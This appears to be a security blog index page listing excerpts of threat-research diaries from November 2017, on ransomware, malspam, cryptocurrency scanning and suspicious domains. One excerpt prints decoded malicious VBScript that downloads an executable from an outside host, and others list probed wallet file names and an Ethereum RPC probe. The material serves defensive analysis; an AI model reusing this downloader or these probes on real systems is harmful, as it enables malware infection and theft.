In a previous diary[1], I presented a dashboard that I’m using to keep track of the DNS traffic on my networks. Tracking malicious domains is useful but what if you could, in a certain way, “predict” the upcoming domains that will be used to host phishing pages? Being a step ahead of the attackers is …
Read more “Proactive Malicious Domain Search, (Thu, Nov 23rd)”
Ethereum is certainly getting a lot of press this year, and with this, we also see the bad guys spending more effort to steal the shiny fresh off the digital mint crypto coins. Etherum itself is a rather complex beast, but one feature Ethereum nodes provide is a remote access option via RPC. Typically, nodes …
Read more “Internet Wide Ethereum JSON-RPC Scans, (Tue, Nov 21st)”
Introduction Last month in October 2017, several sources reported a new ransomware family distributed by Magnitude exploit kit (EK) [1, 2, 3]. Security researchers dubbed the new ransomware “Magniber” because it appears to have replaced Cerber ransomware as distributed through Magnitude EK. Cerber seems to have disappeared since then, but as November 2017 progresses, we’re …
Read more “One month later, Magniber ransomware is still out there, (Mon, Nov 20th)”
Introduction Malicious spam (malspam) with malware disguised as a resume. This is a long-running theme frequently used by criminals to push various types of malware. My Online Security reported about a recent wave earlier this month on 2017-11-10. These resume-themed emails contain Word documents with malicious macros, and the macros are designed to infect your …
Read more “Resume-themed malspam pushing Smoke Loader, (Sun, Nov 19th)”
I observed requests to my webserver to retrieve Bitcoin wallet files: The files they are looking for are: wallet – Copy.dat wallet.dat wallet.dat.1 wallet.dat.zip wallet.tar wallet.tar.gz wallet.zip wallet_backup.dat wallet_backup.dat.1 wallet_backup.dat.zip wallet_backup.zip I’ve seen a couple of such request a couple of years ago, but it’s the first time I see that many. Please post a …
Yesterday, we were contacted by one of our readers who asked if we provide a STIX feed of our blocked list or top-100 suspicious IP addresses. STIX[1] means “Structured Threat Information eXpression” and enables organizations to share indicator of compromise (IOC) with peers in a consistent and machine readable manner. The ISC already provides an …
Domain names remain a gold mine to investigate security incidents or to prevent some malicious activity to occur on your network (example by using a DNS firewall). The ISC has also a page[1] dedicated to domain names. But how can we detect potentially malicious DNS activity if domains are not (yet) present in a blacklist? …
Read more “Suspicious Domains Tracking Dashboard, (Thu, Nov 16th)”
Another day, another malicious document! I like to discover how the bad guys are creative to write new pieces of malicious code. Yesterday, I found another interesting sample. It’s always the same story, a malicious document is delivered by email. The document was called ‘Saudi Declare war Labenon.doc’ (interesting name by the way!). According to …
Read more “If you want something done right, do it yourself!, (Wed, Nov 15th)”
My honeypot captured several copies of this file info.zip (info.vbe). I used Didier‘s Python script decode-vbe.py to examine the file and obtained following output: vagrant@brain:~$ ./decode-vbe.py info.vbe Set WshShell = CreateObject(“WScript.Shell”) If Instr(1,WScript.FullName,”WScript.exe”,1)>0 Then WshShell.Run “CScript “””&WScript.ScriptFullName&””””,0: WScript.Quit End if Tmp=WshShell.ExpandEnvironmentStrings(“%TEMP%”)&”tmp2.exe” strFileURL = “http://www.testswork.ru/tmp2.exe“ strHDLocation = Tmp Set objXMLHTTP = CreateObject(“MSXML2.XMLHTTP”) objXMLHTTP.open “GET”, strFileURL, …
In the past few weeks I have noticed this type of POST activity showing in my honeypot {“id”:0,”jsonrpc“:”2.0″,”method”:”eth_accounts”} looking for ID 0 (root). Activity has a static source port of 65535 and destination port 8080. Do you have logs to share related to this type of activity? [1] https://github.com/ethereum/wiki/wiki/JSON-RPC [2] https://github.com/ethereum/wiki/wiki/JSON-RPC#eth_accounts ———– Guy Bruneau IPSS …
Read more “jsonrpc Scanning for root account, (Mon, Nov 13th)”